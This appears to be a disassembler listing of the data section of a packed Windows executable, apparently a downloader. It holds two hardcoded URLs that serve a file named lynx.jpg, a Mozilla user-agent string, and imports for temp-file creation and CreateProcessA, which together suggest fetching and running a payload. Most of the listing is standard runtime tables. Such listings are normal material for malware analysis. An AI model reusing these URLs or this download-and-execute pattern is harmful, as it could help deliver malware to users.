dword_40DA50 dd 504D54h aHttpThemirabel db 'http://themirabellaguide.com/pr/pic/lynx.jpg',0
; DATA XREF: sub_40137A+26�o
align 4
aHttpYourmirabe db 'http://yourmirabelladirect.com/pr/pic/lynx.jpg',0
; DATA XREF: sub_40137A+41�o
align 4
aListTTooLong db 'list<T> too long',0 ; DATA XREF: sub_401548+2A�o
; sub_401606+2B�o
align 4
aMozilla db 'Mozilla',0 ; DATA XREF: sub_401C1F+29�o
; UPX1:0040FD50�o
dd offset dword_40DD4C
off_40DAD4 dd offset sub_401E45 ; DATA XREF: sub_401C1F+87�o
; sub_401C1F+102�o ...
dd offset sub_401E05
dd offset sub_401D4E
dword_40DAE0 dd 35188CDAh, 5D47B31Ah, 9AE41FA8h, 0D246A135h, 48h, 0Eh dup(0)
; DATA XREF: sub_401E85+64�o
dd offset dword_40F060
dd offset dword_40DDA0
dd 0Fh
dword_40DB38 dd 3 dup(0) dd offset off_40F004
dd offset dword_40DB4C
dword_40DB4C dd 2 dup(0) dd 3, 40DB5Ch, 40DB6Ch, 40DCB0h, 40DCFCh, 0
dd offset off_40F004
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 40DB4Ch
dword_40DB88 dd 3 dup(0) dd offset off_40FD9C
dd offset dword_40DD18
dword_40DB9C dd 3 dup(0) dd offset off_40F044
dd offset dword_40DBB0
dword_40DBB0 dd 2 dup(0) dd 1, 40DBC0h, 40DBC8h, 0
dd offset off_40F044
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 40DBB0h
dword_40DBE4 dd 3 dup(0) dd offset off_40F380
dd offset dword_40DBF8
dword_40DBF8 dd 2 dup(0) dd 2, 40DC08h, 40DC14h, 40DCFCh, 0
dd offset off_40F380
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 40DBF8h
dword_40DC30 dd 3 dup(0) dd offset off_40FD5C
dd offset dword_40DC44
dword_40DC44 dd 2 dup(0) dd 3, 40DC54h, 40DC64h, 40DCB0h, 40DCFCh, 0
dd offset off_40FD5C
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 40DC44h
dword_40DC80 dd 3 dup(0) dd offset off_40FD7C
dd offset dword_40DC94
dword_40DC94 dd 2 dup(0) dd 2, 40DCA4h, 40DCB0h, 40DCFCh, 0
dd offset off_40FD7C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 40DC94h
dword_40DCCC dd 3 dup(0) dd offset off_40FDB8
dd offset dword_40DCE0
dword_40DCE0 dd 2 dup(0) dd 2, 40DCF0h, 40DD30h, 40DCFCh, 0
dd offset off_40FD9C
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 40DD18h
dword_40DD18 dd 2 dup(0) dd 1, 40DD28h, 40DCFCh, 0
dd offset off_40FDB8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 40DCE0h
dword_40DD4C dd 3 dup(0) dd offset off_40FDD4
dd offset dword_40DD60
dword_40DD60 dd 2 dup(0) dd 1, 40DD70h, 40DD78h, 0
dd offset off_40FDD4
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 40DD60h, 3 dup(0)
dword_40DDA0 dd 4256h, 435Bh, 58D0h, 9998h, 9E54h, 0B01Ch, 0B037h, 0B05Dh
; DATA XREF: UPX1:0040DB30�o
; UPX1:00413AF8�o
dd 0B085h, 0B0A8h, 0B0C3h, 0B0DEh, 0B0FEh, 0B121h, 0B144h
dd 0
dword_40DDE0 dd 2 dup(0) ; sub_406958+7�o
dword_40DDE8 dd 2 dup(0) ; sub_40697C+7�o
dword_40DDF0 dd 0 dd offset sub_401FC8
dd 0
dd offset dword_40DE2C
dd 0FFFFFFFFh, 40B014h
dword_40DE08 dd 19930522h, 1, 40DE00h, 5 dup(0) dd 1
dword_40DE2C dd 3, 40DE3Ch, 40E280h, 40E29Ch, 0 dd offset off_40F004
align 8
dd 0FFFFFFFFh, 0
dd 28h, 402073h
dword_40DE58 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402687
align 8
dword_40DE78 dd 0FFFFFFFEh, 0 dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 40412Ah, 40412Eh, 0FFFFFFFEh, 4040F0h, 404104h
dword_40DEA0 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4048A7
align 10h
dword_40DEC0 dd 0FFFFFFFEh, 0 dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404A48
dd 0FFFFFFFEh, 0
dd offset sub_404A54
dword_40DEE8 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404E28
align 8
dword_40DF08 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404F76
align 8
dword_40DF28 dd 0FFFFFFFEh, 0 dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405538
align 8
dword_40DF48 dd 0FFFFFFFEh, 0 dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset loc_4057C1
align 8
dword_40DF68 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405E3C
align 8
dword_40DF88 dd 0FFFFFFFEh, 0 dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 406941h, 406945h, 0
dword_40DFA8 dd 0FFFFFFFEh, 0 dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_406C76
align 8
dd offset loc_406C38
dd offset loc_406C42
dword_40DFD0 dd 0FFFFFFFEh, 0 dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 406D1Fh, 406D28h, 40h, 2 dup(0)
; ---------------------------------------------------------------------------
jmp fword ptr [ebp+40h]
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 40DFECh
dword_40E020 dd 19930522h, 2, 40DFFCh, 1, 40E00Ch, 3 dup(0) dd 1, 0
dword_40E048 dd 0FFFFFFFEh, 0 dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_406F37
align 8
dd offset loc_406EA7
dd offset loc_406EB0
dword_40E070 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40711Eh, 407122h, 0
dword_40E090 dd 0FFFFFFFEh, 0 dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 4071B7h, 4071BBh
dword_40E0AC dd 0 ; ---------------------------------------------------------------------------
jmp loc_41211F
; ---------------------------------------------------------------------------
align 4
dd offset dword_40E0BC
dword_40E0BC dd 2, 40E0C8h, 40E29Ch, 0 dd offset off_40F380
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 407677h, 0
dword_40E0E8 dd 0FFFFFFFEh, 0 dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 407793h, 407797h, 0
dword_40E108 dd 0FFFFFFFEh, 0 dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 4077E3h, 4077E7h, 0
dword_40E128 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4079C9
align 8
dword_40E148 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407CFD
align 8
dword_40E168 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407FAF
align 8
dword_40E188 dd 0FFFFFFFEh, 0 db 0CCh
db 3 dup(0FFh)
align 8
dd 0FFFFFFFEh, 0
dd offset sub_4083F1
align 8
dword_40E1A8 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 408465h, 408481h, 0
dword_40E1C8 dd 0FFFFFFFEh, 0 dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_409265
align 8
dword_40E1E8 dd 0FFFFFFFEh, 0 dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4093CA
align 8
dword_40E208 dd 0FFFFFFFEh, 0 dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 4095D9h, 4095EDh, 0
dword_40E228 dd 0FFFFFFFEh, 0 dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4097D3
align 8
dword_40E248 dd 0FFFFFFFEh, 0 db 0CCh
db 3 dup(0FFh)
align 8
dd 0FFFFFFFEh, 4098C9h, 4098E0h, 0
dd offset off_40FD5C
align 10h
dd 0FFFFFFFFh, 0
dd 28h, 40180Eh, 0
dd offset off_40FD7C
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 401826h, 0
dd offset off_40FD9C
align 8
dd 0FFFFFFFFh, 0
dword_40E2B0 dd 0Ch, 402457h, 3, 40E264h, 40E280h, 40E29Chdword_40E2C8 dd 0 ; sub_401606+48�o ...
dd offset loc_40134D
dd 0
dd offset dword_40E2B0+8
dd 0
dd offset off_40FDB8
dd 0
dd 0FFFFFFFFh, 0
dword_40E2EC dd 0Ch, 401A71h, 2, 40E2D8h, 40E29Chdword_40E300 dd 0 ; sub_402371+54�o
dd offset sub_4012A3
dd 0
dd offset dword_40E2EC+8
dd 0FFFFFFFFh, 40B052h
dword_40E318 dd 19930522h, 1, 40E310h, 5 dup(0) dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 0
dd 40h, 2 dup(0)
dd offset sub_40194F
dd 40h, 2 dup(0)
dd offset loc_4018DD
dd 2 dup(2), 3, 1, 40E35Ch, 2 dup(0)
dd 3, 1, 40E36Ch
dword_40E3A4 dd 19930522h, 4, 40E33Ch, 2, 40E37Ch, 3 dup(0) dd 1, 0FFFFFFFFh, 40B0A0h
dword_40E3D0 dd 19930522h, 1, 40E3C8h, 5 dup(0) dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 40h, 2 dup(0)
dd offset loc_401B44
dd 2 dup(0)
dd 2 dup(1), 40E404h
dword_40E428 dd 19930522h, 2, 40E3F4h, 1, 40E414h, 3 dup(0) dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 40h, 2 dup(0)
dd offset sub_401ACA
dd 2 dup(0)
dd 2 dup(1), 40E45Ch
dword_40E480 dd 19930522h, 2, 40E44Ch, 1, 40E46Ch, 3 dup(0) dd 1, 0FFFFFFFFh, 2 dup(0)
dd offset loc_40B0F9
dd 0FFFFFFFFh, 0
dd 40h, 2 dup(0)
dd offset sub_4017FB
align 10h
dd 1, 2, 1, 40E4BCh
dword_40E4E0 dd 19930522h, 3, 40E4A4h, 1, 40E4CCh, 3 dup(0) dd 1, 0FFFFFFFFh, 40B119h
dword_40E50C dd 19930522h, 1, 40E504h, 5 dup(0) dd 1, 0FFFFFFFFh, 40B13Ch
dword_40E538 dd 19930522h, 1, 40E530h, 5 dup(0) dd 1, 2A9h dup(0)
dd offset aBadAllocation ; "bad allocation"
off_40F004 dd offset off_40C1EC ; DATA XREF: UPX1:0040DB44�o
; UPX1:0040DB6C�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 10h
off_40F030 dd offset aBadAllocation ; DATA XREF: sub_402358+3�o
; "bad allocation"
dd offset aBadAllocation ; "bad allocation"
align 10h
dd offset aBadAllocation ; "bad allocation"
off_40F044 dd offset off_40C1EC ; DATA XREF: UPX1:0040DBA8�o
; UPX1:0040DBC8�o
dd 0
a_?avtype_info@ db '.?AVtype_info@@',0
dword_40F05C dd 2 ; sub_4060C3+19�r
dword_40F060 dd 0B5D19D12h ; sub_401E85+6�r ...
dword_40F064 dd 4A2E62EDh ; sub_406A55+29�w ...
dword_40F068 dd 0FFFFFFFFh ; sub_40470B+13�r ...
dword_40F06C dd 8 ; sub_404694+1E�r ...
dword_40F070 dd 1 dword_40F074 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_40F1D8 dd 0Ch, 8 dword_40F1E0 dd 73132AC5h ; sub_405819+45�w
align 10h
dd offset aBadAllocation ; "bad allocation"
align 10h
dword_40F200 dd 2 off_40F204 dd offset aR6002FloatingP ; DATA XREF: sub_405F23:loc_406053�r
; "R6002\r\n- floating point support not loa"...
dd 8, 40C79Ch, 9, 40C770h, 0Ah, 40C6D8h, 10h, 40C6ACh
dd 11h, 40C67Ch, 12h, 40C658h, 13h, 40C62Ch, 18h, 40C5F4h
dd 19h, 40C5CCh, 1Ah, 40C594h, 1Bh, 40C55Ch, 1Ch, 40C534h
dd 1Eh, 40C514h, 1Fh, 40C4B0h, 20h, 40C478h, 21h, 40C380h
dd 22h, 40C2E0h, 78h, 40C2CCh, 79h, 40C2BCh, 7Ah, 40C2ACh
dd 0FCh, 40C2A8h, 0FFh, 40C298h
dword_40F2B8 dd 0C0000005h, 0Bh, 0 ; sub_40493F+6E�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_40F330 dd 3 ; sub_4060FC+AF�r ...
dword_40F334 dd 7 ; sub_4060FC+B5�r ...
dd 78h
dword_40F33C dd 0Ah ; sub_409624+4�r
dd 0FFFFFFFFh, 0A80h, 0Ch dup(0)
dd 10h, 40DA40h
off_40F380 dd offset off_40C1EC ; DATA XREF: sub_407321+128�o
; UPX1:0040DBF0�o ...
align 8
a_?avbad_except db '.?AVbad_exception@std@@',0
off_40F3A0 dd offset dword_4105E0 ; DATA XREF: sub_40785C:loc_407899�w
; sub_4078A5+8�o ...
dword_40F3A4 dd 1 dd offset dword_4105F8
dd 1, 2 dup(0)
dd offset byte_410610
dd 1, 410628h, 1, 2 dup(0)
dd offset dword_410640
dd 1, 410658h, 1, 410670h, 1, 2 dup(0)
dd offset dword_410688
dd 1, 2 dup(0)
dd offset dword_4106A0
dd 1, 4106B8h, 1, 4106D0h, 1, 2 dup(0)
dd offset dword_4106E8
dd 1, 410700h, 1, 410718h, 1, 22h dup(0)
off_40F4C0 dd offset aHH ; DATA XREF: sub_4078A5+2A�o
; sub_4078A5+4A�o
; " h(((( H"
align 8
dword_40F4C8 dd 43h, 0 ; sub_407B43:loc_407B8E�o ...
dword_40F4D0 dd 1, 15h dup(0) ; sub_407C55+28�o ...
dd offset dword_40F4C8
dd 3 dup(0)
dd offset dword_40F4C8
dd 3 dup(0)
dd offset dword_40F4C8
dd 3 dup(0)
dd offset dword_40F4C8
dd 3 dup(0)
dd offset dword_40F4C8
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_40FBE0
dd 2 dup(0)
dd offset asc_40D1C8 ; " ((((( H"
dd offset dword_40D5D0+80h
dd offset dword_40D5D0+200h
dd offset off_40FB20
off_40F5A8 dd offset dword_40F4D0 ; DATA XREF: sub_4047F1+93�r
; sub_40493F+D2�r ...
dd 1
off_40F5B0 dd offset dword_40F4D0 ; DATA XREF: sub_40AE76+17�o
dd offset dword_40F5B8
dword_40F5B8 dd 17h dup(0) ; sub_40493F+9A�o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 31h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_40F7D8 db 0 ; DATA XREF: sub_408290+102�w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 23h dup(0)
byte_40F8E0 db 0 ; DATA XREF: sub_408290+11E�w
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
db 0
aAbcdefghijkl_0 db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
dd 21h dup(0)
off_40F9E0 dd offset dword_40F5B8 ; DATA XREF: sub_407F17+4C�r
; sub_407F17:loc_407F89�r ...
byte_40F9E4 db 1 ; DATA XREF: sub_4080B7+111�r
db 2, 4, 8
dword_40F9E8 dd 3A4h dword_40F9EC dd 82798260h, 21h, 0dword_40F9F8 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
off_40FAD8 dd offset sub_40A845 ; DATA XREF: sub_4094A7:loc_4094AB�r
dd offset sub_40A845
dd offset sub_40A845
dd offset sub_40A845
dd offset sub_40A845
dd offset sub_40A845
dd offset sub_40A845
dd offset sub_40A845
dd offset sub_40A845
dd offset sub_40A845
byte_40FB00 db 3 ; DATA XREF: UPX0:00409D5B�r
; UPX0:loc_409D7E�r
align 4
dword_40FB04 dd 19930520h, 3 dup(0) ; sub_409F49+2�o
dd offset asc_40D1C8 ; " ((((( H"
dd offset dword_40D3C8+2
align 10h
off_40FB20 dd offset aSun ; DATA XREF: sub_407A03+D9�o
; UPX1:0040F5A4�o ...
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_40D5D0+300h
dd 409h, 1, 0
dd offset off_40FB20
dd 2Eh ; DATA XREF: UPX1:off_40FBE0�o
off_40FBE0 dd offset dword_40FBDC ; DATA XREF: sub_407A03+14�o
; sub_40A0FB+B�r ...
off_40FBE4 dd offset dword_4107F0 ; DATA XREF: sub_40A0FB+1D�r
off_40FBE8 dd offset dword_4107F0 ; DATA XREF: sub_40A0FB+2F�r
off_40FBEC dd offset dword_4107F0 ; DATA XREF: sub_40A13B+C�r
off_40FBF0 dd offset dword_4107F0 ; DATA XREF: sub_40A13B+1E�r
off_40FBF4 dd offset dword_4107F0 ; DATA XREF: sub_40A13B+30�r
off_40FBF8 dd offset dword_4107F0 ; DATA XREF: sub_40A13B+42�r
off_40FBFC dd offset dword_4107F0 ; DATA XREF: sub_40A13B+54�r
off_40FC00 dd offset dword_4107F0 ; DATA XREF: sub_40A13B+66�r
off_40FC04 dd offset dword_4107F0 ; DATA XREF: sub_40A13B+78�r
dd 2 dup(7F7F7F7Fh), 40FBE0h
dword_40FC14 dd 0FFFFFFFEh ; sub_407F17+13�r ...
dd 1, 2Eh, 1, 3 dup(0)
dd 7080h, 1, 0FFFFF1F0h, 0
dword_40FC40 dd 545350h, 0Fh dup(0)dword_40FC80 dd 544450h, 0Fh dup(0) dd offset dword_40FC40
dd offset dword_40FC80
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 2 dup(0)
dd offset aMozilla ; "Mozilla"
dd offset aBadAllocation ; "bad allocation"
dd offset aBadAllocation ; "bad allocation"
off_40FD5C dd offset off_40C1EC ; DATA XREF: UPX1:0040DC3C�o
; UPX1:0040DC64�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_40FD7C dd offset off_40C1EC ; DATA XREF: UPX1:0040DC8C�o
; UPX1:0040DCB0�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_40FD9C dd offset off_40C1EC ; DATA XREF: UPX1:0040DB94�o
; UPX1:0040DCFC�o ...
dd 0
a_?avexception@ db '.?AVexception@std@@',0
off_40FDB8 dd offset off_40C1EC ; DATA XREF: UPX1:0040DCD8�o
; UPX1:0040DD30�o ...
align 10h
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
off_40FDD4 dd offset off_40C1EC ; DATA XREF: UPX1:0040DD58�o
; UPX1:0040DD78�o
dd 0
dd 56413F2Eh, 6E695743h, 656C6946h, 4040h, 5 dup(0)
dword_40FE00 dd 73537D2Fh ; sub_402191+3�r
dword_40FE04 dd 0 ; UPX0:loc_40B1D1�w ...
align 10h
dword_40FE10 dd 0 ; sub_402371+32�w
dword_40FE14 dd 0 ; sub_4062B7:loc_4062C9�r ...
dd 0
dword_40FE1C dd 0 ; sub_409C89+15�r ...
dword_40FE20 dd 73133A56h ; sub_404A60+51�r ...
dword_40FE24 dd 0FD3EA6Fh ; sub_404A60+3D�w ...
dword_40FE28 dd 0FD3E6EAh ; sub_404A60+4A�w ...
dword_40FE2C dd 0FD24BF8h ; sub_404A60+5E�w ...
dword_40FE30 dd 0 ; UPX0:off_40C274�o
dword_40FE34 dd 0 dd 0
dword_40FE3C dd 0 dd 10h dup(0)
dword_40FE80 dd 0 ; sub_404CDE+DF�r
align 8
dword_40FE88 dd 0 ; UPX0:0040C278�o
dd 22h dup(0)
word_40FF14 dw 0 ; DATA XREF: sub_404CDE+4F�w
align 4
word_40FF18 dw 0 ; DATA XREF: sub_404CDE+48�w
align 4
word_40FF1C dw 0 ; DATA XREF: sub_404CDE+41�w
align 10h
word_40FF20 dw 0 ; DATA XREF: sub_404CDE+3A�w
align 4
dword_40FF24 dd 0 dword_40FF28 dd 0 dword_40FF2C dd 0 dword_40FF30 dd 0 dword_40FF34 dd 0 dword_40FF38 dd 0 dword_40FF3C dd 0 dword_40FF40 dd 0 ; sub_404CDE+85�r
word_40FF44 dw 0 ; DATA XREF: sub_404CDE+33�w
align 4
dword_40FF48 dd 0 dword_40FF4C dd 0 word_40FF50 dw 0 ; DATA XREF: sub_404CDE+2C�w
align 4
dd 80h dup(0)
dword_410154 dd 73537D2Fh dword_410158 dd 0 ; sub_4053D3+29�r ...
align 10h
dword_410160 dd 2 ; sub_4055F2:loc_40561A�r ...
dword_410164 dd 0A28h dword_410168 dd 501h dword_41016C dd 5 ; sub_405629+30�r
dword_410170 dd 1 dword_410174 dd 0 dword_410178 dd 0 align 10h
dword_410180 dd 0 ; sub_4062B7:loc_40637C�r ...
align 10h
dword_410190 dd 0 align 8
byte_410198 db 0 ; DATA XREF: sub_4056F7+2D�w
align 4
dword_41019C dd 0 dword_4101A0 dd 0 ; sub_4056F7+B4�w
dword_4101A4 dd 0 dword_4101A8 dd 0 align 10h
dword_4101B0 dd 6 dup(0) db 0
byte_4101C9 db 3 dup(0) ; DATA XREF: sub_405F23+8A�o
dd 40h dup(0)
db 0
byte_4102CD db 0 ; DATA XREF: sub_405F23+92�w
align 10h
dd 7Dh dup(0)
dword_4104C4 dd 0 dword_4104C8 dd 41h dup(0) byte_4105CC db 0 ; DATA XREF: sub_40652A+24�w
align 10h
dword_4105D0 dd 0 ; sub_4065E3+24�w ...
dword_4105D4 dd 390000h ; sub_404E31+72�r ...
dword_4105D8 dd 73130A5Ch ; sub_4077F6+B�w
align 10h
dword_4105E0 dd 155C40h, 0FFFFFFFFh, 3 dup(0) ; UPX1:off_40F3A0�o
dd 0FA0h
dword_4105F8 dd 155C68h, 0FFFFFFFFh, 3 dup(0) dd 0FA0h
byte_410610 db 90h ; DATA XREF: UPX1:0040F3B8�o
db 5Ch, 15h, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 0FA0h, 155CB8h, 0FFFFFFFFh, 3 dup(0)
dd 0FA0h
dword_410640 dd 155CE0h, 0FFFFFFFFh, 3 dup(0) dd 0FA0h, 155D08h, 0FFFFFFFFh, 3 dup(0)
dd 0FA0h, 155D30h, 0FFFFFFFFh, 3 dup(0)
dd 0FA0h
dword_410688 dd 155D58h, 0FFFFFFFFh, 3 dup(0) dd 0FA0h
dword_4106A0 dd 155D80h, 0FFFFFFFFh, 3 dup(0) dd 0FA0h, 155DA8h, 0FFFFFFFFh, 3 dup(0)
dd 0FA0h, 155DD0h, 0FFFFFFFFh, 3 dup(0)
dd 0FA0h
dword_4106E8 dd 155DF8h, 0FFFFFFFFh, 3 dup(0) dd 0FA0h, 155E20h, 0FFFFFFFFh, 3 dup(0)
dd 0FA0h, 155E48h, 0FFFFFFFFh, 3 dup(0)
dd 0FA0h
dword_410730 dd 0 dd 8 dup(0)
dword_410754 dd 0 ; sub_40803D+1D�w ...
word_410758 dw 0 ; DATA XREF: sub_408290+E7�w
align 4
dd 2 dup(0)
dword_410764 dd 0 dword_410768 dd 0 dword_41076C dd 0 dword_410770 dd 0 ; sub_408578+21C�r ...
dword_410774 dd 0 ; sub_40916E+CA�r ...
dword_410778 dd 73537D2Fh ; sub_409665:loc_4096AE�o ...
dword_41077C dd 73537D2Fh ; sub_409665:loc_409704�o ...
dword_410780 dd 73537D2Fh dword_410784 dd 73537D2Fh ; sub_409665:loc_409710�o ...
dd 0
dword_41078C dd 73537D2Fh dd 2 dup(0)
dword_410798 dd 73537D2Fh dword_41079C dd 0FD3C506h ; sub_409843+11�r ...
dd 0Fh dup(0)
dword_4107DC dd 0 ; sub_409A5B+61�w ...
dword_4107E0 dd 0 ; sub_409A5B:loc_409BB6�r
dword_4107E4 dd 0 ; sub_409A5B+179�r
dword_4107E8 dd 0 ; sub_409A5B:loc_409B31�r
dword_4107EC dd 0 ; sub_409A5B+E2�r ...
dword_4107F0 dd 0 ; UPX1:off_40FBE8�o ...
dword_4107F4 dd 0 ; sub_40A226+37�w ...
dword_4107F8 dd 0 ; sub_40A460+3A�w ...
dd 2Fh dup(0)
dword_4108B8 dd 0 ; sub_4010EC+149�w ...
dword_4108BC dd 0 ; sub_4010EC:loc_40121D�w ...
dword_4108C0 dd 0 ; sub_401000+2B�o ...
dword_4108C4 dd 0 ; sub_401000+23�r ...
dword_4108C8 dd 0 ; sub_401606:loc_401663�w ...
dword_4108CC dd 0 ; sub_40854D�r ...
dword_4108D0 dd 0 ; sub_40854D+6�r ...
dword_4108D4 dd 0 ; sub_408505+36�w ...
dword_4108D8 dd 0 ; sub_408578+2FC�w ...
dword_4108DC dd 0 ; sub_40888C�r ...
dword_4108E0 dd 0 ; sub_408578+249�r ...
dword_4108E4 dd 1 ; sub_404F20+13�r ...
dword_4108E8 dd 0 ; sub_406718+BF�w ...
dd 5 dup(0)
dword_410900 dd 0 ; sub_406718+67�r ...
dd 3Fh dup(0)
dword_410A00 dd 0 dword_410A04 dd 0 ; sub_402569+A5�w ...
dword_410A08 dd 0 ; sub_402569+8B�w ...
dword_410A0C dd 0 ; sub_4062B7+3�r ...
dword_410A10 dd 0 dword_410A14 dd 0 ; sub_405665+74�o ...
dword_410A18 dd 0 dword_410A1C dd 0 ; sub_405020+28�r ...
dword_410A20 dd 0 dword_410A24 dd 0 ; sub_40625A:loc_40626B�r ...
dd 576h dup(0)
db 60h ; `
align 4
db 0
db 0B0h, 2 dup(0)
db 1
aGetstdhandle db 'GetStdHandle',0
dw 4701h
aEttempfilename db 'etTempFileNameA',0
db 1
aCreateprocessa db 'CreateProcessA',0
db 1
aGettemppatha db 'GetTempPathA',0
dw 4301h
aReatefilea db 'reateFileA',0
